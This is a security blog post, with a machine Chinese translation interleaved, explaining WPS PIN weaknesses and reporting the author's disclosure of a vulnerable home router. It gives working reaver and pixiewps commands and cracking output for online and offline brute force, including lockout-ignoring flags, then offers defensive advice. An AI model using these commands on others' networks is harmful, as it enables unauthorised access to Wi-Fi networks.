TL;DR Disable WPS on your router or access point today! Otherwise, an attacker could gain a foothold into your network and plan for further attacks.
TL; DR立即禁用路由器或接入点上的WPS! 否则,攻击者可能会立足您的网络并计划进一步的攻击。
In my own research, I was surprised that my home router was vulnerable to WPS offline brute force attack. What that means was that an attacker within a reasonable distance (approximately up to ~50m if you a strong wireless capable device was in used), was able to extract out my WiFi’s WPA2/PSK of greater than 12 in length (with reasonable complexity) in just mere seconds!
在我自己的研究中,我感到惊讶的是我的家用路由器容易受到WPS离线暴力破解的攻击。 这意味着攻击者在合理的距离内(如果使用的是强大的具有无线功能的设备,则大约在50m之内)可以提取出我的WiFi长度超过12的WPA2 / PSK(具有合理的复杂性)在短短几秒钟内!
I have disclosed the vulnerability to my Telco service provider, who is working with the vendor to issue a patch for all users using the issued device.
我已经将该漏洞披露给了我的电信服务提供商,后者正在与供应商合作,为使用发行设备的所有用户发行补丁。
What is WPS?In 2006, Wi-Fi Alliance introduced WPS which was originally known as Wi-Fi Simple Config. WPS is a wireless network security standard that establish connections between a router and wireless devices faster and easier. Instead of the traditional way of selecting the network name (also named SSID) and keying the password (also called WPA-PSK key), WPS can be triggered by just a number of button press on the physical device. It works well for electronic devices (e.g. printers, TVs, smart home products etc.) with no or limited user interface.
什么是WPS? 在2006年,Wi-Fi联盟推出了WPS,最初称为Wi-Fi简单配置。 WPS是一种无线网络安全标准,可更快,更轻松地在路由器和无线设备之间建立连接。 替代传统的选择网络名称(也称为SSID)和键入密码(也称为WPA-PSK密钥)的方法,只需在物理设备上按几次按钮即可触发WPS。 它适用于没有或没有用户界面的电子设备(例如打印机,电视,智能家居产品等)。
WPS in applicationEven if you have not used WPS before, I am sure most of you would have come across it, and yet not knowing what it was for back then. For explanation reasons, let’s assume there are two wireless devices, a.k.a clients, (i.e. printer and a android phone) that wish to join the network using WPS. The first step is to trigger the WPS feature on the wireless device.
应用程序中的WPS即使您以前从未使用过WPS,我相信你们中的大多数人都会碰到它,但那时还不知道它的用途。 出于解释的原因,我们假设有两个无线设备(即客户端)(即打印机和android手机)希望使用WPS加入网络。 第一步是触发无线设备上的WPS功能。
Secondly, the user have to go to the router or Access Point (AP) to trigger the WPS feature. Once pressed, this technology will perform its magic.
其次,用户必须转到路由器或接入点(AP)才能触发WPS功能。 一旦按下,该技术将发挥其魔力。
The devices should then be connected after a seconds later. If the wireless device has some form of user interface, you should be able to take note of the successful connection to the network.
一秒钟后应连接设备。 如果无线设备具有某种形式的用户界面,则应该能够记录到网络的成功连接。
In the printer’s case, a successful connection will likely be indicated by the flashing of LED or some other form of indicators.
在打印机的情况下,可能会通过LED闪烁或某种其他形式的指示灯来指示连接成功。
What we have discussed is the Push Button Configuration (PBC) method. An alternative is to provide the 8 digit pin where it is known as the Personal identification Number (PIN) method. In addition, these modes can be triggered either by the client or by the AP and vice versa.
我们讨论的是按钮配置(PBC)方法。 一种替代方法是提供8位数字的引脚,这被称为个人识别码(PIN)方法。 另外,这些模式可以由客户端或由AP触发,反之亦然。
How is WPS bad?As mentioned earlier, WPS was created with convenience in mind, that means that there is a huge trade off between security and convenience. In a nutshell, an attacker who manage to obtain the WPS Pin to an AP can authenticate to your network and even extract your seemingly complex WiFi password.
WPS有多糟糕? 如前所述,创建WPS时要考虑便利性,这意味着在安全性和便利性之间要进行巨大的权衡。 简而言之,设法获得WPS Pin到AP的攻击者可以向您的网络进行身份验证,甚至可以提取您看似复杂的WiFi密码。
There are three types of attacks against WPS enabled APs. The first of which is an online brute force attack while the second is an offline attack on the WPS pin. An attacker can perform these two attacks from up to approximately 50 meters depending on their wireless network device capability. The last attack requires the user to be physically next to the AP. For example, the attacker could press the WPS button on the AP (as shared in the previous section) and at times, the WPS pin could be printed on the AP itself. Assuming there is a malicious insider, this could be an easy entry to the corporate network. Even though these attacks have been shared over the internet over the past decade, WPS enabled devices are still everywhere (enabled by default)!
针对启用WPS的AP的攻击有三种。 第一种是在线暴力攻击, 第二种是对WPS引脚的离线攻击。 攻击者可以根据其无线网络设备的能力在大约50米的距离内进行这两次攻击。 最后一次攻击要求用户在物理上靠近AP。 例如,攻击者可以按AP上的WPS按钮(如上一节所述),有时WPS引脚可以打印在AP本身上。 假设存在恶意内部人员,这可能很容易进入公司网络。 即使在过去十年中已通过Internet共享了这些攻击,但启用WPS的设备仍然无处不在(默认情况下启用)!
Before we dive into the specifics of the first two attacks, lets head into how the WPS pin is structured.
在深入探讨前两种攻击的细节之前,让我们先了解WPS引脚的结构。
WPS Pin StructureEvery WPS pin consist of a 8 digit long number. The last digit of the pin is a checksum. However, these 8 digit pin isnt exactly used in totality when validating the PIN against the AP. The process requires the client to first prove possession of the first four digits. If the first four digits are accurate, the AP will then require the client to furnish the remaining 4 digits.
WPS引脚结构每个WPS引脚均包含8位长数字。 引脚的最后一位是校验和。 但是,在针对AP验证PIN时,并不能完全完全使用这8位引脚。 该过程要求客户首先证明拥有前四位数字。 如果前四位数字正确,则AP将要求客户端提供其余的四位数字。
From an attackers perspective, this basically means that a brute force attempt is actually feasible, with a total of 11000 possibilities (10⁴ — first four digits plus 10³ — three digits in the second half since the last digit is a checksum which can be calculated).
从攻击者的角度来看,这基本上意味着强行尝试实际上是可行的,总共有11000种可能性(10⁴-前四位数字加10³-下半场三位数字,因为最后一位是可以计算的校验和) 。
Online brute force attackBefore going into the nitty gritty details, a proper WPS transaction has a series of exchange that happens between a client and an AP.
在线暴力攻击在深入了解具体细节之前,适当的WPS交易需要在客户端和AP之间进行一系列交换。
*for simplicity reasons, I have termed it as client and AP rather than the industry terms (registrar and enrollee) *出于简单原因,我将其称为客户和AP,而不是行业术语(注册商和注册者)
In summary, these series of exchanges is also known as a “cryptodance”. Each side proves to the other that it knows the PIN without giving it away first.
总之,这些系列的交换也称为“加密”。 每一方都向对方证明自己知道PIN,而无需先将其泄露。
To conduct this online brute force attack, we can use the reaver tool. Do note that a lot of blogs out there are using reaver’s older version and the flags/parameters used may not apply in the latest version of reaver. I’ve spent many hours trying to figure out the appropriate flags and also how to interpret if the tool is working well based on the verbose output messages. I will be sharing them in detail. For the conduct of my demonstration, I am using a kali-linux VM along with a Wi-Fi USBAdapter (Alfa).
要进行这种在线暴力攻击,我们可以使用掠夺者工具。 请注意,许多博客都在使用reaver的旧版本,并且所使用的标志/参数可能不适用于最新版本的reaver。 我花了很多时间试图找出适当的标志,以及如何根据详细的输出消息来解释该工具是否运行良好。 我将详细分享它们。 为了演示,我使用的是kali-linux VM和Wi-Fi USBAdapter(Alfa)。
Place the wireless adapter to monitoring mode:root@kali:~# airmon-ng start wlan0
将无线适配器置于监视模式:root @ kali:〜#airmon-ng start wlan0
Identify nearby devices that have WPS:root@kali:~# wash –i wlan0mon
识别附近有WPS的设备:root @ kali:〜#wash –i wlan0mon
BSSID Ch dBm WPS Lck Vendor ESSID — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —58:6D:8F:09:95:77 11 -30 2.0 No Broadcom TestAP
BSSID Ch dBm WPS Lck供应商ESSID — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — 58:6D:8F:09:95:77 11- 30 2.0没有Broadcom TestAP
*a simple search around my home vicinity revealed more than 30 APs allowing WPS.
*在我家附近进行的一次简单搜索显示,有30多个AP允许使用WPS。
Start performing the online brute force against the BSSID you are targeting:root@kali:~# reaver -i wlan0mon -b 58:6D:8F:09:95:77 -vv -d 3 -N -L –c 11
开始针对目标BSSID进行在线暴力破解:root @ kali:〜#reaver -i wlan0mon -b 58:6D:8F:09:95:77 -vv -d 3 -N -L –c 11
Reaver v1.6.6 WiFi Protected Setup Attack ToolCopyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>[+] Waiting for beacon from 58:6D:8F:09:95:77[+] Switching wlan0mon to channel 11[+] Received beacon from 58:6D:8F:09:95:77[+] Vendor: Broadcom[+] Trying pin “11115670”[+] Sending authentication request[+] Sending association request[+] Associated with 58:6D:8F:09:95:77 (ESSID: TestAP)[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[+] Received M1 message[+] Received M3 message[+] Sending M4 message[+] Received WSC NACK[+] Sending WSC NACK
Reaver v1.6.6 WiFi保护的设置攻击工具版权所有©2011,战术网络解决方案,Craig Heffner <cheffner@tacnetsol.com> [+]等待信标从58:6D:8F:09:95:77 [+]将wlan0mon切换到频道11 [+]从58:6D:8F:09:95:77接收到信标[+]供应商:Broadcom [+]尝试图钉“ 11115670” [+]发送认证请求[+]发送关联请求[+]与58关联:6D:8F:09:95:77(ESSID:TestAP)[+]发送EAPOL START请求[+]接收身份请求[+]发送身份响应[+]接收M1消息[+]接收M3消息[+]发送M4消息[+]收到WSC NACK [+]发送WSC NACK
//If the client is unable to furnish the first four digit of the pin, the AP will not send the M5 message. The brute force continues with a different pin.
//如果客户端无法提供该引脚的前四位数,则AP将不会发送M5消息。 蛮力以不同的销钉继续。
[+] 15.62% complete @ 2020–06–25 03:16:33 (33 seconds/pin)[+] Trying pin “63968767”[+] Sending authentication request[+] Sending association request[+] Associated with 58:6D:8F:09:95:77 (ESSID: TestAP)[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response< truncated for breveity reasons>[+] Received M1 message[+] Sending M2 message< truncated for breveity reasons>[+] Received M3 message[+] Sending M4 message< truncated for breveity reasons>[+] Received M5 message[+] Sending M6 message< truncated for breveity reasons>[+] Received M7 message[+] Sending WSC NACK[+] Pin cracked in 51 seconds[+] WPS PIN: ‘63968767’[+] WPA PSK: ‘testing1’[+] AP SSID: ‘TestAP’
[+]完成15.62%,2020年6月25日03:16:33(33秒/引脚)[+]尝试引脚“ 63968767” [+]发送认证请求[+]发送关联请求[+]与58相关联: 6D:8F:09:95:77(ESSID:TestAP)[+]发送EAPOL START请求[+]收到身份请求[+]发送身份响应<由于简短原因被截断> [+]收到M1消息[+]发送M2消息<因简短原因而被截断> [+]接收到M3消息[+]发送M4消息<因简短性而被截断> [+]已接收M5消息[+]正在发送M6消息<因简短性而被截断> [+]已接收M7消息[ +]正在发送WSC NACK [+]引脚在51秒内破解[+] WPS PIN:'63968767'[+] WPA PSK:'testing1'[+] AP SSID:'TestAP'
*Note: Do not be alarmed if you observe a lot of repeated packets coming from the AP. I have snipped them out for breveity reasons.
*注意:如果您观察到很多重复的数据包来自AP,请不要惊慌。 为了简洁起见,我已将其删除。
reaver -i wlan0mon -b 58:6D:8F:09:95:77 -vv -d 3 –N -L –c 11
掠夺者-i wlan0mon -b 58:6D:8F:09:95:77 -vv -d 3 –N -L –c 11
- vv -> Display non-critical warnings (-vv or -vvv for more)- d -> Set the delay between pin attempts. There may be to modify this value or the timeout (-t) to circumvent possible rate-limiting on the device- N -> Do not send NACK messages when out of order packets are received. I noticed that if this option is not set, I am unable to perform any successful brute force- -L -> Ignore locked state reported by the target AP- -c -> Set the 802.11 channel for the interface (implies -f)
-vv->显示非紧急警告(更多信息为-vv或-vvv)-d->设置引脚尝试之间的延迟。 可能需要修改此值或超时(-t)来规避设备上可能的速率限制-N->收到乱序数据包时不要发送NACK消息。 我注意到,如果未设置此选项,则无法执行任何成功的蛮力操作--L->忽略目标AP报告的锁定状态--c->设置接口的802.11通道(隐含-f)
Based on the output of the tool, it takes approximately 33 seconds to test out a pin. Thus, with 11000 possibilities, that may take up to 4 days to gain access to the network. Still, a pretty feasible wait to gain a foothold to the network. I usually start the brute force from 6000 onward (modify the codes in keys.c) and then subsequently downwards from 6000. May be just me, but I tend to notice that the majority (80%) of WPS pins starts from a higher range number (6000 0000–9999 9999). With sufficient time, an online brute force attack will work and eventually reveal the PSK to an attacker.
根据工具的输出,测试一根针大约需要33秒钟。 因此,如果有11000种可能性,则可能最多需要4天才能访问网络。 不过,要在网络上立足是相当可行的等待。 我通常从6000开始(在keys.c中修改代码),然后从6000开始向下进行暴力破解。也许只是我,但我倾向于注意到大多数(80%)WPS引脚从较高范围开始编号(6000 0000–9999 9999)。 只要有足够的时间,在线暴力攻击就会起作用,并最终向攻击者显示PSK。
Offline brute force attackA Swiss researcher by the name of Dominique Bongard found a flaw in many APs implementation of the M3 message highlighted in Figure 6. In it, the AP encrypts the actual PIN, uses a strong algorithm (AES) with secret keys consisting of two randomly-chosen numbers, and sends you the result. As mentioned, the process is a ‘cryptodance’ and the AP has committed to its proof that it knows the PIN, but in a way that you can’t verify until later.
离线暴力攻击一位名叫Dominique Bongard的瑞士研究人员发现许多AP实现M3消息的缺陷,如图6所示。在其中,AP加密了实际的PIN,并使用了一个强大的算法(AES),其密钥包括两个随机选择的数字,然后将结果发送给您。 如前所述,该过程是一种“加密算法”,AP已承诺对其知道PIN的证据进行了证明,但是这种方式直到以后您才能进行验证。
Referencing a good analogy shared in Sophos blog “it’s a bit like a sealed-bid auction, where the router’s bid is locked in before yours, but in a way that you can’t see it in order to determine your bid. But what the Swiss researcher found is that many routers didn’t seal their bids very well, using “random” numbers that you could guess, or in some cases calculate for yourself. In other words, at step M3, you could simply fail the protocol, and go ahead cracking the encryption on the M3 data packet. That would reveal the PIN directly, no guessing required.”
引用Sophos博客中分享的一个很好的类比“有点像密封的竞标,路由器的出价在您之前被锁定,但以某种方式您无法看到它来确定您的出价。 但是这位瑞士研究人员发现,许多路由器使用的是您可能会猜到的“随机”数字,或者在某些情况下会自己计算,因此出价不高。 换句话说,在步骤M3,您可以简单地使协议失败,然后继续对M3数据包进行加密。 这样就可以直接显示PIN,而无需猜测。”
All in all, it is possible to brute force for the WPS PIN by capturing an attempted (and even failed) exchange attempt. This allows an attacker to obtain the WPS PIN in mere seconds, and eventually obtain the Wi-Fi PSK key, gaining access to the Wi-Fi network.
总而言之,可以通过捕获尝试(甚至失败)的交换尝试来强行使用WPS PIN。 这使攻击者能够在几秒钟内获得WPS PIN,并最终获得Wi-Fi PSK密钥,从而获得对Wi-Fi网络的访问权限。
However, this attack goes back to early 2010s and most of the vendors have already patched this issue. Just recently when I embarked on this research journey, I recall telling my colleagues that WPS offline cracking attacks have long been fixed, and reading up forums, security testers have never seen an AP vulnerable to this issue before.
但是,这种攻击可以追溯到2010年代初,大多数供应商已经修补了此问题。 就在最近,当我开始这一研究旅程时,我记得曾告诉我的同事,WPS离线破解攻击早已得到修复,并且在阅读论坛时,安全测试人员从未见过AP容易受到此问题的攻击。
Ironically when I returned home to test on my home networks, I was surprised that the tool ‘pixiedust’ instantly returned my WPA2-PSK in mere seconds. Whats more is that I had used a password stronger than 12 characters and with reasonable complexity. The nightmare was that the AP does not allow me to disable WPS. I immediately searched the internet for an updated firmware but there wasn’t any.
具有讽刺意味的是,当我回到家中进行家庭网络测试时,我惊讶于“ pixiedust”工具在短短几秒钟内立即将我的WPA2-PSK返回。 更重要的是,我使用的密码强度超过12个字符并且具有合理的复杂性。 噩梦是AP不允许我禁用WPS。 我立即在互联网上搜索了更新的固件,但没有任何固件。
*Till date, I have informed the Telco on the vulnerability and they are working with the vendor to issue a patch in the coming months.
*到目前为止,我已经将该漏洞告知了电信公司,他们正在与供应商合作,在未来几个月内发布补丁。
Most of the WPS attack tools have all been integrated into the Reaver tool. This test is pretty quick, if it works it works, if it doesn’t, that just means your product is not vulnerable to offline brute force attacks. To conduct this attack, simply run the following commands:root@kali:/tmp# reaver -i wlan0mon -b <bssid> -vv -L -N -c 1 –K
大多数WPS攻击工具都已集成到Reaver工具中。 该测试非常快速,如果可以运行,则可以运行,如果不能运行,则意味着您的产品不容易受到离线暴力攻击。 要进行此攻击,只需运行以下命令:root @ kali:/ tmp#reaver -i wlan0mon -b <bssid> -vv -L -N -c 1 –K
// -K will trigger the pixiedust attack. All it requires is just a single failed attempt to attempt to crack the Pin.
// -K将触发pixiedust攻击。 它所需要的仅仅是尝试破解Pin的一次失败尝试。
Reaver v1.6.6 WiFi Protected Setup Attack ToolCopyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>[+] Switching wlan0mon to channel 1[+] Waiting for beacon from <BSSID>[+] Received beacon from <BSSID>[+] Trying pin “12345670”[+] Sending authentication request[+] Sending association request[+] Associated with <BSSID> (ESSID: <redacted>)[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[+] Received M1 message[+] Sending M2 messageexecuting pixiewps -e <redacted> -s <redacted> -z <redacted> -a <redacted> -n <redacted> -r <redacted>Pixiewps 1.4[?] Mode: 3 (RTL819x)[*] Seed N1: <redacted>[*] Seed ES1: <redacted>[*] Seed ES2: <redacted>[*] PSK1: <redacted 16 byte hex>[*] PSK2: <redacted 16 byte hex>[*] ES1: <redacted 16 byte hex>[*] ES2: <redacted 16 byte hex>[+] WPS pin: <redacted>[*] Time taken: 0 s 70 ms[+] Pixiewps: success: setting pin to <redacted>[+] Received M3 message[+] Sending M4 message[+] Received M5 message[+] Sending M6 message[+] Received M7 message[+] Sending WSC NACK[+] Sending WSC NACK[+] Updated P1 array[+] Updated P2 array[+] Quitting after pixiewps attack[+] Pin cracked in 15 seconds[+] WPS PIN: <redacted>[+] WPA PSK: <redacted>[+] AP SSID: <redacted>
Reaver v1.6.6 WiFi保护的设置攻击工具版权所有©2011,战术网络解决方案,Craig Heffner <cheffner@tacnetsol.com> [+]将wlan0mon切换到通道1 [+]等待来自<BSSID>的信标[+]从< BSSID> [+]尝试引脚“ 12345670” [+]发送认证请求[+]发送关联请求[+]与<BSSID>(ESSID:<已编辑>)关联[+]发送EAPOL START请求[+]接收到身份请求[+]发送身份响应[+]接收M1消息[+]发送M2消息正在执行pixiewps -e <已编辑> -s <已编辑> -z <已编辑> -a <已编辑> -n <已编辑> -r <已编辑> Pixiewps 1.4 [?]模式:3(RTL819x)[*]种子N1:<已编辑> [*]种子ES1:<已编辑> [*]种子ES2:<已编辑> [*] PSK1:<已编辑的16字节十六进制> [* ] PSK2:<已编辑的16字节十六进制> [*] ES1:<已编辑的16字节十六进制> [*] ES2:<已编辑的16字节十六进制> [+] WPS引脚:<已编辑> [*]耗时:0 s 70 ms [+] Pixiewps:成功:将引脚设置为<已编辑> [+]接收M3消息[+]发送M4消息[+]接收M5消息[ +]发送M6消息[+]接收M7消息[+]发送WSC NACK [+]发送WSC NACK [+]更新了P1阵列[+]更新了P2阵列[+]在pixiewps攻击后退出[+]引脚在15秒内破裂[+] WPS PIN:<已编辑> [+] WPA PSK:<已编辑> [+] AP SSID:<已编辑>
As seen from the screenshot, the PIN was cracked in 15 seconds. This is way faster than the online brute forcing technique which could take up to an approximate of four days.
从屏幕截图中可以看到,PIN在15秒内被破解。 这比在线暴力破解技术要快得多,后者可能需要大约四天的时间。
What should you do to prevent yourself from being a target?Personally, I felt that Wi-Fi settings, configurations and security have often been overlooked. We have seen the good and the bad of WPS and yet, it is enabled by default in most APs today. I will like to share a couple of recommendations to prevent WPS attacks:
您应该怎么做才能防止自己成为目标? 我个人认为,Wi-Fi设置,配置和安全性经常被忽略。 我们已经看到了WPS的优缺点,但是,当今大多数AP默认启用了它。 我想分享一些建议来防止WPS攻击:
- Disable WPS if it is not in used … Disable WPS if it is not in used … Disable WPS if it is not in used! I can’t stress this enough. You can do so by heading to your AP web interface (if you have not changed your web portal login credentials, this will be a good time to do so!) and locate the WPS feature. By disabling it, you are cutting off all connections via WPS. This applies to both the push button mode or the pin mode (as demonstrated in the attacks). If you really need to use WPS to pair devices with no or limited user interface, just remember to turn on and off this feature after the successful pairing.
-如果不使用,请禁用WPS…如果不使用,请禁用WPS…如果不使用,请禁用WPS! 我不能太强调这一点。 您可以通过转到AP Web界面(如果尚未更改Web门户登录凭据,这是一个不错的时机!)来找到WPS功能。 通过禁用它,您将切断通过WPS的所有连接。 这适用于按钮模式或固定模式(如攻击所示)。 如果您确实需要使用WPS来配对没有或受限用户界面的设备,只需记住在成功配对之后打开和关闭此功能。
- Evaluate your home routers by performing simple test on them. There are instances even when you turn off your WPS, it could still be mysteriously accepting WPS in the background. You can watch for such behaviour by listening on the air (wash –i wlan0mon). If you are a frequent user of WPS, you may want to ensure that the AP is not vulnerable to offline brute force attack.
-通过对家用路由器进行简单测试来评估它们。 甚至在您关闭WPS的情况下,它仍然可能会在后台神秘地接受WPS。 您可以通过收听广播来观察这种行为(清洗–i wlan0mon)。 如果您经常使用WPS,则可能要确保AP不受脱机暴力攻击的威胁。
- Remove any printed WPS pin on your physical device. With the disclosed pin, an attacker could specify it by using the –p flag in Reaver. A malicious insider will then be able to gain access to your network PSK within a single try via the online brute force attack.
-卸下物理设备上的所有打印的WPS引脚。 使用公开的引脚,攻击者可以通过使用Reaver中的–p标志来指定它。 然后,恶意内部人员将可以通过在线暴力攻击在一次尝试中获得对您网络PSK的访问。
扫一扫
3693
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
